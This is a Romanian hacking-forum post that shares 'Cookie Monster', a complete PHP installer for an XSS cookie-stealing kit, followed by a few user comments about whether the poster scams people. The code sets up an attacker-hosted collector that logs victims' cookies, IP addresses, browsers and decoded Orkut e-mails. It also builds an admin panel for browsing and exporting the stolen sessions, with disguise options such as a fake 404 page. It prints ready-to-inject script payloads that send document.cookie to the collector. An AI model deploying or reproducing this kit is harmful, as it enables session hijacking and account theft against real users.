[XSS Tool]Cookie Monster

koruno.php · August 8, 2013

Cookie Monster este un script PHP care va ajut? s? fura?i cookieuri/sesiuni cu ajutorul vulnerabilit??ilor de tip XSS.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script language="JavaScript" type="text/javascript">
<!--
function ValidaTodos(){
var campo = document.forms[0];
var i=0;
for (i=0; i<campo.elements.length; i++){
var valida = campo.elements[i].value;
if (valida == ''){
alert('Fill all Fields');
return false;
}
}
}
//-->
</script>	
<title>Cookie Monster v1.0a Installer</title>
<style type="text/css">
table.bordasimples {border-collapse: collapse;}
table.bordasimples tr td {border:1px solid #000000;background-color:#ffffff;pading:6;}
fieldset {display: inline;-moz-border-radius: 6px;padding: 9px;}
legend{color: #fff;background: #000000;border: 2px solid #880000;padding: 2px 6px;}
body { color: #333333; font-size: small; font-family: Verdana, Arial; background-color: #dbdbdb;}
textarea { background-color: #880000;font-family: Verdana, Arial; color:#ffffff;font-size: 10px;overflow: auto;overflow-y: hiden;overflow-x: hiden;width:785px;white-space: pre; }
a {color: #dd0000;text-decoration:none;}
a:visited {color: #880000;}
a:hover {color: #000000;}
</style>
</head>
<html>
<body>
<?php

//Capturador
$criaacc ='<?php                                                            
require("config.php");

        $cookie = htmlspecialchars($_GET[\'cookie\'], ENT_QUOTES);
        $IP = htmlspecialchars($_SERVER[\'REMOTE_ADDR\'], ENT_QUOTES);
        $navegador = htmlspecialchars($_SERVER[\'HTTP_USER_AGENT\'], ENT_QUOTES);
        $host = "".$IP." - ".gethostbyaddr($_SERVER[\'REMOTE_ADDR\'])."";
        $data = date ("j/m/Y - H:i:s");


function finaliza($saida,$tipo){
if($saida == \'silent\'){
    exit();
    }

if($saida == \'error\'){
if($tipo == \'orkut\'){
echo "<script>window.location = \'http://www.orkut.com/Home.asp\';</script>";
exit();
}
else{
            echo "<title>404 Error - File Not Found</title><body><h1>404 Error - File Not Foud</h1>The file you were trying to open cannot be found. The file may have been damaged, moved, deleted, or a bug causes it</b>";
            exit();
}
}

if($saida == \'loop\'){
echo "<script>for (i = 0; i <= 100000000; i++){alert(\'Erro: Access violation at address 0723304E Read of address 00000010\')}</script>";
exit();
}
}	

function conecta($fservidor,$fuser,$fsenha,$fdb){

      	mysql_connect("$fservidor", "$fuser", "$fsenha") or die(mysql_error());
            mysql_select_db("$fdb") or die(mysql_error());
    }

function captura($ftbl,$fdata,$fip,$fnavegador,$fcookie,$fblock,$fuserid,$femail,$fextra){
   		mysql_query("INSERT INTO $ftbl (data,ip,navegador,cookie,block,userid,email,extra,referer) VALUES(\'$fdata\',\'$fip\',\'$fnavegador\',\'$fcookie\',\'$fblock\',\'$fuserid\',\'$femail\',\'$fextra\', \'$_SERVER[HTTP_REFERER]\') ") or die(mysql_error());
   		  finaliza($saida,$tipo);
   		}

//Captura em Orkut Mode
if ($tipo == \'orkut\'){

                if(empty($cookie) || strlen($cookie) < 200 ){					
                finaliza($saida,$tipo);
}
                else{

  		 	preg_match(\'/ID=(\d+)/\', $cookie, $uid);

                preg_match(\'/USR=[A-Za-z0-9=\/\+]+/\', $cookie, $email);
          $emailbs64 = substr($email[0], 4);
            $emaildec = base64_decode($emailbs64);

            if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$", $emaildec)) {
  		$emaildec = "nulo";
            }

                preg_match(\'/ORKUTPREF=[A-Za-z0-9=\/\+\:\_\- +]+/\', $cookie, $pref);
                if(empty($pref[0])){
                finaliza($saida,$tipo);
                }				 

conecta($servidor,$user,$senha,$db);
$QUERY = "SELECT `block` FROM `$tbl` WHERE `block`=\'$uid[1]\'";
$RESULT = mysql_query($QUERY) or die(mysql_error());

            if(mysql_num_rows($RESULT) >= 1) {
   		 finaliza($saida,$tipo);
                }


captura($tbl,$data,$host,$navegador,$pref[0],$uid[1],$uid[1],$emaildec,NULL);
finaliza($saida,$tipo);				
}
}

//Captura no Modo Default
if($tipo == \'outros\'){

        if(empty($cookie)){
        finaliza($saida,$tipo);
}
        else{

conecta($servidor,$user,$senha,$db);
$QUERY = "SELECT `block` FROM `$tbl` WHERE `block`=\'$IP\'";
$RESULT = mysql_query($QUERY) or die(mysql_error());

            if(mysql_num_rows($RESULT) >= 1) {
   		 finaliza($saida,$tipo);
                }
captura($tbl,$data,$host,$navegador,$cookie,$IP,NULL,NULL,NULL);
finaliza($saida,$tipo);	  	
}
}
?>';

//Log Monster
$crialog ='<?php
require("config.php");

$ver="1.0b";
$auth = $_POST[\'password\'];

//Logout
if($_GET[\'logout\'] == \'sair\'){
if($domain == \'.localhost\'){
setcookie(\'login\', \'\', time()-60000, \'/\');
}	
setcookie(\'login\', \'\', time()-60000, \'/\', $domain);
echo "<script language=javascript>alert(\'Hasta la vista baby!\');</script>";
echo "<script>document.location=\'{$_SERVER[\'PHP_SELF\']}?nc=".md5(rand(1000000000,99999999999))."\';</script>";
}

//Login
if(md5($auth) == "$admin"){
if($domain == \'.localhost\'){
setcookie(\'login\', $admin, time()+86400, \'/\');
}		
setcookie(\'login\', $admin, time()+86400, \'/\', $domain);
echo "<script language=\'javascript\'>alert(\'Welcome to Cookie Monster!\');</script>";
echo "<script>document.location=\'{$_SERVER[\'PHP_SELF\']}?nc=".md5(rand(1000000000,99999999999))."\';</script>";
}

//Head Orkut Mode
if($tipo == "orkut"){
    echo \'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Cookie Monster v\'.$ver.\' - Running in Orkut Mode - by X9</title>
<style type="text/css">
.tbanner{background-color:#bfd0ea;}
.ttabela{background-color:#e5ecf4;}
table.bordasimples {border-collapse: collapse;}
table.bordasimples tr td {border:1px solid #a1bbe4;}
legend{color: #000000;background: #e5ecf4;border: 1px solid #a1bbe4;padding: 2px 6px;}
fieldset {display: inline;-moz-border-radius: 7px;padding:10px;}
body { color: #000000; font-size: 12px; font-family: Verdana, Geneva, Arial, sans-serif; background-color: #D4DDED;}
textarea { background-color: #e8eae8; font-family: Verdana, Arial, sans-serif;color:#5d665b;font-size: 12px;overflow: auto;overflow-y: auto;overflow-x: auto;width:730px;white-space:nowrap; }
a:link{color: #0047be;text-decoration: underline;}
a:hover {color: #c40098;text-decoration: underline;}
</style>
</head>
<html>
<body>\';
}

//Head Modo Padrão
if($tipo == "outros"){
echo \'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Cookie Monster v\'.$ver.\' Running in default mode</title>
<style type="text/css">
table.bordasimples {border-collapse: collapse;}
table.bordasimples tr td {border:1px solid #000000;background-color:#ffffff;pading:6;}
fieldset {display: inline;-moz-border-radius: 6px;padding: 9px;}
legend{color: #fff;background: #000000;border: 2px solid #880000;padding: 2px 6px;}
body { color: #333333; font-size: small; font-family: Verdana, Arial; background-color: #dbdbdb;}
textarea { background-color: #880000;font-family: Verdana, Arial; color:#ffffff;font-size: 12px;overflow: auto;overflow-y: hiden;overflow-x: hiden;width:730px;white-space: nowrap; }
a {color: #dd0000;text-decoration:none;}
a:visited {color: #880000;}
a:hover {color: #000000;}
</style>
</head>
<html>
<body>
\';	
}
//Load Time
$time = microtime();
$time = explode(\' \', $time);
$time = $time[1] + $time[0];
$start = $time;



if($_COOKIE[\'login\'] == $admin){

//Layout Mudar Senha
if($_GET[\'mudar\'] == \'senha\'){

        echo "<center><table width=40% border=1 bgcolor=#c9d6eb class=bordasimples cellpadding=5 cellspacing=0>";
        echo "<br/><br/><tr><td align=center colspan=2><b>Change Your Password<img src=http://img512.imageshack.us/img512/2127/cadeadovx5.gif></b></td></tr>";
        echo "<tr><td align=center colspan=2>";
        echo "<form method=\"post\" action=\"logmonster.php\">";
        echo "<br/><b>New Password: </b>";
        echo "<input name=password type=password id=password /> ";
        echo "<input type=submit name=Submit value=Submit /><br/><br/>";
        echo "<input name=\"Dominio\" type=\"hidden\" value=\"$domain\" />";
        echo "<input name=\"Banco_de_Dados\" type=\"hidden\"  value=\"$db\" />";
      echo "<input name=\"Servidor\" type=\"hidden\"  value=\"$servidor\" />";
      echo "<input name=\"Tabela\" type=\"hidden\"  value=\"$tbl\" />";
      echo "<input name=\"Senha\" type=\"hidden\"  value=\"$senha\" />";
      echo "<input name=\"Usuario\" type=\"hidden\"  value=\"$user\" />";
      echo "<input name=\"ctipo\" type=\"hidden\"  value=\"$tipo\" />";
      echo "<input name=\"csaida\" type=\"hidden\"  value=\"$saida\" />";	
     	echo "<input name=\"mudar\" type=\"hidden\"  value=\"ok\" />";	
        echo "</form>";
        echo "</td></tr></table></center>";
        exit();
}		

//Mudando a Senha		
if($_POST[\'mudar\'] == \'ok\'){

$cdomain = $_POST["Dominio"];
$cdb = $_POST["Banco_de_Dados"];
$cservidor = $_POST["Servidor"];
$ctbl = $_POST["Tabela"];
$cadmin = $_POST["password"];
$csenha = $_POST["Senha"];
$cuser = $_POST["Usuario"];
$ctipo = $_POST["ctipo"];
$csaida = $_POST["csaida"];	
$mdadmin= md5("$cadmin");
$criaconfig ="<?php\n\$domain = \'$cdomain\';\n\$db = \'$cdb\';\n\$servidor = \'$cservidor\';\n\$tbl = \'$ctbl\';\n\$admin = \'$mdadmin\';\n\$senha = \'$csenha\';\n\$user = \'$cuser\';\n\$tipo = \'$ctipo\';\n\$saida = \'$csaida\';\n?>";		
$fh = @fopen(\'config.php\', \'w\') or die(myErro("Error At Changing Your Password"));
@fwrite($fh, $criaconfig);
@fclose($fh);
@chmod(\'config.php\', 0755) or die(myErro("Error At trying make CHMOD 0755 Permission on <b>config.php</b>Try Make it Manually by FTP or Files Manager"));
echo "<script>alert(\'Password has been changed, Use the new password to log in\')</script>";
echo "<script>document.location=\'{$_SERVER[\'PHP_SELF\']}?nc=".md5(rand(1000000000,99999999999))."\';</script>";
} 

            mysql_connect("$servidor", "$user", "$senha") or die(mysql_error());
            mysql_select_db("$db") or die(mysql_error());

//Strings da Páginação
$did = $_GET[\'did\'];
$pagina = $_GET[\'pagina\'];
$pag_views =10;


If (!$pagina){$pagina = 1;} 
else{$pagina = $pagina;}
$mat = $pagina -1;
$inicio = $mat * $pag_views; 

//Delete by ID
if($_GET[\'cmd\']==delete)
{

    			$del = "DELETE FROM `$tbl` WHERE `ID`=\'$did\' LIMIT 1";
    			mysql_query($del);
    			$opt = "OPTIMIZE TABLE $tbl";
    			echo "<script>alert(\'LOG $did DELETED SUCCESSFULLY\')</script>";
    			$referrer = $_SERVER[\'HTTP_REFERER\'];
    			echo "<script>document.location=\'$referrer\';</script>";
   		  	mysql_query($opt);

}
//Função Exportar
if($_GET[\'exportar\'] == 1){
$exportc =0;
$myFile = "".$tbl."_cookie_export.txt";
$fh = fopen($myFile, \'w\') or die(\'Erro ao Abrir o Arquivo\');
$fh2 = fopen($myFile, \'a\') or die(\'Erro ao Abrir o Arquivo\');
$export = mysql_query("SELECT * FROM $tbl ") or die(mysql_error());  
    while($row = mysql_fetch_array( $export )) {

$stringData = "".$row[cookie]."\n\n";
fwrite($fh2, $stringData);
$exportc++;
}
fclose($fh2);
@chmod($myFile, 0755) or die();
echo "<center><table class=bordasimples cellpadding=5 cellspacing=0 width=810px>
  <tr bgcolor=#c9d6eb><td class=bordasimples>".$exportc." Cookies Exported (<a href=\'".$myFile."\' target=_blank>Click Here to Download</a>)<br/>
  </td></tr>
  </table><br/>
  </center>
  ";

}

        echo "<table width=\"800px\" border=\"1\" align=\"center\" class=\"bordasimples\" cellpadding=\"5\" cellspacing=\"0\">\n";
        echo "<tr class=\"tbanner\"><td colspan=\"2\" align=\"center\" valign=\"top\"><img src=\"http://img365.imageshack.us/img365/8091/cookimonstercy4.jpg\" border=\"0\" align=\"top\"/></td></tr>\n";
        echo "<tr class=\"ttabela\"><td align=\"left\" colspan=\"2\"><b>Cookie List</b> - <a href=\"?logout=sair\">Logout</a> | <a href=\"?mudar=senha\">Change Password</a> | <a href=\"?exportar=1\">Export Cookies to TXT</a> | <a href=\"javascript:void(0)\" onclick=\"window.open(\'http://dicasetruques.110mb.com/cversion/checkversioni.php?checkversion=".$ver."\',\'Atualização\',\'width=400,height=200\')\">Update Check</a></td></tr>\n";

            $sql = "SELECT * FROM $tbl";
            $query = mysql_query($sql);
            $limita = "$sql order by ID LIMIT $inicio,$pag_views";
            $executa = mysql_query($limita);
            $linhas = mysql_num_rows($query);
            $paginas = $linhas / $pag_views;
            $volta = $pagina -1;
            $proxima = $pagina +1;


    $cor=\'um\';
    while($row = mysql_fetch_array( $executa )){

          //Cor Sim Cornudo Cornão Orkut

          if($tipo == \'orkut\'){

          if($cor == \'um\'){
          echo "<tr bgcolor=\"#c9d6eb\"><td width=\"5%\"><center>";
   		  	echo $row[ID];
    			echo "<br/>\n";
    			echo "<a href=\"?cmd=delete&did=".$row[ID]."\">[X]</a></center>";
    			echo "</td><td width=\"95%\">"; 
                echo "<a href=\"http://www.orkut.com/Profile.aspx?uid=".$row[userid]."\" target=\"_blank\"><img src=\"http://img244.imageshack.us/img244/204/userwa2.gif\" border=\"0\" alt=\"Perfil\"/></a> <a href=\"mailto:".$row[email]."\"><img src=\"http://img152.imageshack.us/img152/7995/emailgi9.gif\"  border=\"0\" alt=\"E-mail\"/></a><br/><br/><fieldset><legend><b>Date</b></legend> ".$row[data]."</fieldset>  <fieldset><legend><b>IP</b></legend>".$row[ip]."</fieldset><br /><br /><fieldset><legend><b>Referer</b></legend>".$row[referer]."</fieldset><br/><br/><fieldset><legend><b>Browser</b></legend>".$row[navegador]."</fieldset><br/><br/><fieldset><legend><b>Cookies</b></legend><textarea rows=\"4\" readonly >".$row[cookie]."</textarea></fieldset>\n";
                echo "</td>"; 
                echo "</tr>";
              $cor=\'dois\';
               }

              else{
                echo "<tr bgcolor=\"#bfd0ea\"><td width=\"5%\"><center>";
   		  	echo $row[ID];
    			echo "<br/>";
    			echo "<a href=\"?cmd=delete&did=".$row[ID]."\">[X]</a></center>";
    			echo "</td><td width=\"95%\">"; 
                echo "<a href=\"http://www.orkut.com/Profile.aspx?uid=".$row[userid]."\" target=\"_blank\"><img src=\"http://img244.imageshack.us/img244/204/userwa2.gif\" border=\"0\" alt=\"Perfil\"/></a> <a href=\"mailto:".$row[email]."\"><img src=\"http://img152.imageshack.us/img152/7995/emailgi9.gif\"  border=\"0\" alt=\"E-mail\"/></a><br/><br/><fieldset><legend><b>Date</b></legend> ".$row[data]."</fieldset>  <fieldset><legend><b>IP</b></legend>".$row[ip]."</fieldset><br/><br/><fieldset><legend><b>Referer</b></legend>".$row[referer]."</fieldset><br /><br /><fieldset><legend><b>Browser</b></legend>".$row[navegador]."</fieldset><br/><br/><fieldset><legend><b>Cookies</b></legend><textarea rows=4 readonly>".$row[cookie]."</textarea></fieldset>\n";
                echo "</td>"; 
                echo "</tr>";
                $cor=\'um\';
               } 

            }
         if($tipo == \'outros\'){ 
           //Print lista Normal
       		  echo "<tr><td width=\"5%\"><center>";
   		  	echo $row[ID];
    			echo "<br/>";
    			echo "<a href=\"?cmd=delete&did=".$row[ID]."\">[X]</a></center>";
    			echo "</td><td width=\"95%\">"; 
                echo "<fieldset><legend><b>Data</b></legend>".$row[data]."</fieldset><fieldset><legend><b>IP</b></legend>".$row[ip]."</fieldset><br/><br/><fieldset><legend><b>Referer</b></legend>".$row[referer]."</fieldset><br /><br /><fieldset><legend><b>Browser</b></legend>".$row[navegador]."</fieldset><br/><br/><fieldset><legend><b>Cookies</b></legend><textarea rows=4 readonly >".$row[cookie]."</textarea></fieldset>";
                echo "</td>"; 
                echo "</tr>";
                  } 

} 
      //Row de Páginação
            echo "<tr class=\"ttabela\"><td colspan=\"2\">";


    //Exibe Paginação
    If ($volta>0) echo "<a href=\"?pagina=".$volta."\">Previous</a>";
    For ($i = 0; $i <= $paginas; $i++)
{ 
        $pag =  $i +1;
        $did = $row[\'ID\'];
 		echo " <a href=\"?pagina=".$pag."\">".$pag."</a>"; 
}

If ($pagina<$paginas){echo " <a href=\"?pagina=".$proxima."\">Next</a> ";}

//Fecha html table
echo "</td></tr></table><br/><p align=\"center\">Cookie Monster ".$ver." by X9<br><i>English Translation by Hugo</i></p>";

//Calcula Load Time
$time = microtime();
$time = explode(\' \', $time);
$time = $time[1] + $time[0];
$finish = $time;
$total_time = round(($finish - $start), 4);

//Exibe Load Time
echo \'<p align="center"><i>Page loaded in \'.$total_time.\' seconds</i></p>\';
}

else
{
if(!empty($_POST[\'password\'])){
echo "<script language=\'javascript\'>alert(\'Wrong Password, Try Again!\');</script>";
    } 
      echo "<table align=\"center\" width=\"40%\" bgcolor=\"#c9d6eb\" border=\"1\" class=\"bordasimples\" cellpadding=\"5\" cellspacing=\"0\">\n";
        echo "<br/><br/><tr><td align=\"center\" colspan=\"2\"><b>Admin Area <img src=\"http://img512.imageshack.us/img512/2127/cadeadovx5.gif\"/></b></td></tr>\n";
        echo "<tr><td align=\"center\" colspan=\"2\">";
        echo "<form method=\"post\" action=\"logmonster.php\">\n";
        echo "<br/><b>Password: </b>\n";
        echo "<input name=\"password\" type=\"password\" id=\"password\"/>\n";
        echo "<input type=\"submit\" name=\"Submit\" value=\"Login\" /><br/><br/>\n";
        echo "</form>";
        echo "</td></tr></table>\n";

}
?>
</body>
</html>';


//Function Dir
function my_dir(){
$me = $_SERVER['PHP_SELF'];
$Apathweb = explode("/", $me);
$myFileName = array_pop($Apathweb);
$pathweb = implode("/", $Apathweb);
$myURL = "http://".$_SERVER['HTTP_HOST'].$pathweb."/";
$PAGE_BASE['www'] = $myURL;
$www = $PAGE_BASE['www'];
return $www;
}

//MSG de Erro
function myErro($msgerro){
    echo "<center><table width=799px border=1 bgcolor=#c9d6eb class=bordasimples cellpadding=5 cellspacing=0><tr><td align=left colspan=2><b><img src=http://img217.imageshack.us/img217/5850/alertnq1.gif border=0 align=center>Config Error</b><br><br>". $msgerro . "<br><br><a href=javascript:history.back()><< Back</a></td></tr></table></center><br>";
}

//MSG de Sucesso
function myOk($msg){
    echo "<center><table width=799px border=1 bgcolor=#c9d6eb class=bordasimples cellpadding=5 cellspacing=0><tr><td align=left colspan=2><img src=http://img524.imageshack.us/img524/8066/tksvinfogreenyh6.gif border=0 align=center> ". $msg . "<br></td></tr></table></center><br>";
}

//Cria Arquivos
function myCria($myFile,$stringData){
$fh = @fopen($myFile, 'w') or die(myErro("Error at Create file <b>".$myFile."</b>"));
myOk("File <b><a href=".my_dir()."".$myFile." target=_blank>".$myFile."</a></b> Created Successfully");
@fwrite($fh, $stringData);
@fclose($fh);
@chmod($myFile, 0755) or die(myErro("Fail at trying make CHMOD 0755 Permission on File<b> ".$myFile." </b>Make it Manually by FTP or Files Manager"));
} 


$cdomain = $_POST["Dominio"];
$cdb = $_POST["Banco_de_Dados"];
$cservidor = $_POST["Servidor"];
$ctbl = $_POST["Tabela"];
$cadmin = $_POST["Senha_do_Admin"];
$csenha = $_POST["Senha"];
$cuser = $_POST["Usuario"];
$ctipo = $_POST["ctipo"];
$cblock = $_POST["Cookie_de_Bloqueio"];
$csaida = $_POST["csaida"];

//Setup
if($_GET["setup"] == on)
{

echo"
<div align=\"center\">
<form action=\"{$_SERVER['PHP_SELF']}\"; onsubmit=\"return ValidaTodos();\" method=\"post\" enctype=\"multipart/form-data\" name=\"form1\" id=\"form1\">
   <table width=\"799\" border=\"1\" align=\"center\" cellpadding=\"5\" cellspacing=\"0\" class=\"bordasimples\">
      <tr>

        <td colspan=\"2\" align=\"left\" valign=\"top\"><strong><img src=\"http://img365.imageshack.us/img365/8091/cookimonstercy4.jpg\" width=\"799\" height=\"82\" align=\"top\" /></strong></td>
      </tr>
      <tr>
        <td width=\"378\" height=\"398\" align=\"left\" valign=\"top\"><p><strong>MySQL Config</strong></p>
        <p><strong>Database<br />
        </strong>
          <input name=\"Banco_de_Dados\" type=\"text\" id=\"Banco_de_Dados\" />

          <br />
          <span class=\"style1\">Database Name</span><strong><br />
</strong><br />
<strong>Password <br />
          </strong>
            <input name=\"Senha\" type=\"password\" id=\"Senha\" />
            <br />
            <span class=\"style1\">Database Password</span> <br />

        <br />
        <strong>User<br />
        </strong>
        <input name=\"Usuario\" type=\"text\" id=\"Usuario\" />
        <br />
        <span class=\"style1\">Database User</span> </p>

        <p><strong>Table<br />
        </strong>
          <input name=\"Tabela\" type=\"text\" id=\"Tabela\" />
          <br />
          <span class=\"style1\">Table That Will be Created to Store Cookies</span></p>
        <p>

          <label><strong>Server<br />
          </strong>
          <input name=\"Servidor\" type=\"text\" id=\"Servidor\" />
          <br />
          <span class=\"style1\">MySQL Host Location<br /> 
e.g. localhost</span></label></p></td>
        <td width=\"395\" align=\"left\" valign=\"top\"><p><strong>Cookie Monster Options</strong></p>

        <p><strong>Admin Password<br />
        </strong>
          <input name=\"Senha_do_Admin\" type=\"password\" id=\"Senha_do_Admin\" size=\"8\" />
          <br />
          <span class=\"style1\">Type the Password You Want to Use</span></p>
        <p><strong>Domain</strong><br />

          <input name=\"Dominio\" type=\"text\" id=\"Dominio\" value=\".{$_SERVER['HTTP_HOST']}\";/>
          <br />
          <span class=\"style1\">Domain Addres of Your Website e.g.  
.sub.domain.com
          (<em>This is Used to Create the Login Cookie)</em></span><br />
        <br />
          <p><strong>Capture Mode</strong> 
          <label>

          <select name=\"ctipo\" id=\"ctipo\">
            <option value=\"orkut\">Orkut</option>
            <option value=\"outros\" selected=\"selected\">Others Websites(default)</option>
          </select>
          </label>
</p>
        <p><b>End Action</b> 
          <select name=\"csaida\" id=\"csaida\">
            <option value=\"silent\">Silent</option>
            <option value=\"error\">With Error Page</option>
            <option value=\"loop\">Loop Alert</option>
            </select>
          <br />

          <br />
          <br />
          <input type=\"submit\" name=\"Submit\" value=\"Submit\" />
          <input name=\"configurar\" type=\"hidden\" id=\"configurar\" value=\"Sim\" />
        </p>        </td>
      </tr>
    </table>
    <strong>*You Must Fill All the Fields*</strong>

    <br />
  </form>
</div>
</body>
</html>
";
exit();
}

//Configuração
if($_POST["configurar"] == Sim)
{

echo "<center><img src=http://img508.imageshack.us/img508/6835/cookimonsterrs0.jpg><table width=799px border=1 bgcolor=#c9d6eb class=bordasimples cellpadding=5 cellspacing=0><tr><td align=left colspan=2>Cookie Monster Instalation</td></tr></table></center><br><center><b>";
//Conexão MySQL	
@mysql_connect("$cservidor", "$cuser", "$csenha") or die(myErro("Error at connect to database, Make Sure if <b>Server, User and Database Password</b> are Correct"));
@mysql_select_db("$cdb") or die(myErro("Error at Selecting Database <b>". $cdb. "</b> Make Sure if <b>Server, User and Database Password</b> Are Correct"));
myOk("Successfully Connected To the Database<b> " . $cdb . " </b>");

//Tenta Cria Tabela
@mysql_query("CREATE TABLE `$ctbl`(
  `ID` INT NOT NULL AUTO_INCREMENT, 
  `data` TEXT NOT NULL,
  `userid` TEXT NULL,
  `email` TEXT NULL,
  `ip` TEXT NOT NULL,
  `navegador` TEXT NOT NULL,
  `cookie` TEXT NOT NULL,
  `referer` TEXT NOT NULL,
  `block` TEXT NOT NULL,
  `extra` TEXT NULL,
  PRIMARY KEY (`ID`)
)
TYPE = myisam;") or die(myErro("Error At Creating Table <b> " . $ctbl . " </b> Make Sure if <b>Server, User and Database Password</b> are Correct.<br><br><i>This Error can Occurrs if the Table <b> ".$ctbl." </b> is Already There. Then Choose A new Table Name</i>"));  
myOk("MySQL Table <b> ". $ctbl ." </b> Created Successfully!");
@mysql_query("INSERT INTO `$ctbl`(data,userid,email,ip,navegador,cookie,referer,block,extra) VALUES('03/10/2025 - 10:55:00','11366245690762217423','x9moderador@hotmail.com','192.168.254.1 - 1921682541-veloxzone.com.br','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4,gzip(gfe)','ORKUTPREF=ID=11366245690762217423:INF=0:SET=116653396:LNG=79:CNT=29:RM=0:USR=eGl6bmluZUBnbWFpbC5jb20=:PHS=:TS=1178070210:LCL=pt-BR:NET=3:TOS=2147483647:GC=DQAAAHAAAADmJma1mk7tbQLo3aMz8yEMRLvnjIKjGbs9LcoQPExv-jD0iqMWvrkKihcXgTrji0NV40xhslN2T-4mK6NewcDlz9VsPfCLfCQyflri5-stxH3eClHHs7iKSWHjuvE9-jGuSvze356pgEQiQ-vbvRah:PE=eGl6bmluZUBnbWFpbC5jb20=:GTI=0:GID=:VER=2:S=NVgTxYHnhbRMiVsg58C4I9mrPMk=:', 'thiswebsite.com', '11366245690762217423','')")or die(mysql_error());


$mdadmin= md5("$cadmin");

//Config.php
$criaconfig ="<?php\n\$domain = '$cdomain';\n\$db = '$cdb';\n\$servidor = '$cservidor';\n\$tbl = '$ctbl';\n\$admin = '$mdadmin';\n\$senha = '$csenha';\n\$user = '$cuser';\n\$tipo = '$ctipo';\n\$saida = '$csaida';\n?>";

//Script JS1
$js1 = "new Image().src='".my_dir()."getmonster.php?cookie='+encodeURIComponent(document.cookie);";

//Script JS2
$js2 = "document.location='".my_dir()."getmonster.php?cookie='+encodeURIComponent(document.cookie);";

//Criando Arquivos do Cookie Monster
//Config
myCria('config.php',$criaconfig); 
//Capturador
myCria('getmonster.php',$criaacc);
//Log
myCria('logmonster.php',$crialog);
//cm.js 1
myCria('cm.js',$js1);
//cm2.js
myCria('cm2.js',$js2);

$cex = "\n";
myCria(''.$ctbl.'_cookie_export.txt',$cex);
//Instalação concluida
myOk("Congratulations <b>Cookie Monster v1.0b</b> Was Installed Succesfully!");
echo "<b>Basic Codes</b><Br>";
echo "<textarea cols=122 rows=10>\n1st\n<script src='".my_dir()."cm.js'</script>\n\n";
echo "2nd\n<script src='".my_dir()."cm2.js'</script>\n\n";
echo "3rd\n<script>new Image().src='".my_dir()."getmonster.php?cookie='+encodeURIComponent(document.cookie);</script>\n\n";
echo "4th\n<script>document.location='".my_dir()."getmonster.php?cookie='+encodeURIComponent(document.cookie);</script>\n\n *** It is Not Recommended Use the Fourth One ***</textarea>";
echo "<br><i><b>For Your Security delete install.php from your host</b></i><br></center>";
exit();
}
$etapas='termos';
if($etapas == 'termos'){
//Layout Termos
echo "<center><img src=http://img508.imageshack.us/img508/6835/cookimonsterrs0.jpg><table width=799px border=1 bgcolor=#c9d6eb class=bordasimples cellpadding=5 cellspacing=0><tr><td align=left colspan=2>Use Terms </td></tr></table></center><br><center><b>";	
echo "<center><table width=799px border=1 class=bordasimples cellpadding=5 cellspacing=0><tr>
  <td colspan=2 align=left valign=\"top\"><p><b>Use Terms</b><br />
          <label>
      <div align=\"center\">
        <textarea name=\"textarea\" rows=\"20\">Before Install Cookie Monster, Read Through This. 

The user of This IP: {$_SERVER['REMOTE_ADDR']} declare readed it, understood it and accept all the Terms And Conditions Below.

1 - Copyright

Cookies Monster's Source is owned by your developer and is protected on general terms of Copyright.
The Use of this is allowed for Personal Use, is NOT allowed modifications, copys, borrow, rent, or anyway to get money.

2 – Use and Risks

All the results of Using Cookie Monster is your Resposability, who is in risk is YOU, not us. Even the developer or anyone who is involved in this creation.
</textarea><br>
<a href=?setup=on>I Want Install Cookie Monster</a> | <a href=http://www.dicasetruques.110mb.com>I Disagree</a><br /><br />
      </div>
      </label>
      </td></tr></table>
</center>";

}
?>

xplonde · August 8, 2013

Aveti grija cu ce luati de la acest individ, care se ocupa cu dat tepe oamenilor de pe rst.

h05th · August 11, 2013

xplonde , numai ratati primesc tzepe de la ratati , cei tzepuiti sunt mai ratati decat ratatii ce dau tzeapa ! Doar nu esti tu atat de prost , in cat sa nu citesti liniile de cod din acest tool !Daca ai luat tzeapa de la cineva , nu trebuie sa injuri si sa urli in gura mare ! Tu nu trebuie sa spui nimanui , ca tu te faci de cacat , nu el ! Te ia lumea de fraier , si iti vei lua mai multe tzepe !

babyface · August 12, 2013

@h05th, 1 la mana, omu' nu a injurat pe nimeni, iar 2 la mana, nu vad de ce trebuie sa il faci prost atata timp cat el ne face atenti la magariile unuia, din cate vad, tu ejti ala care injura si urla cat il tin bosogii, chill man...

koruno.php · August 12, 2013

xplonde: B?i, deci e?ti psihotic. Haide, am dat ?eap?, arat? te rog frumos dovezile ?i plec eu singur. Dac? nu ai aceste dovezi, nu te mai bag? în toate topicurile mele.

Sign In

[XSS Tool]Cookie Monster

Recommended Posts

koruno.php

xplonde

h05th

babyface

koruno.php

Join the conversation

Browse

Activity

Pages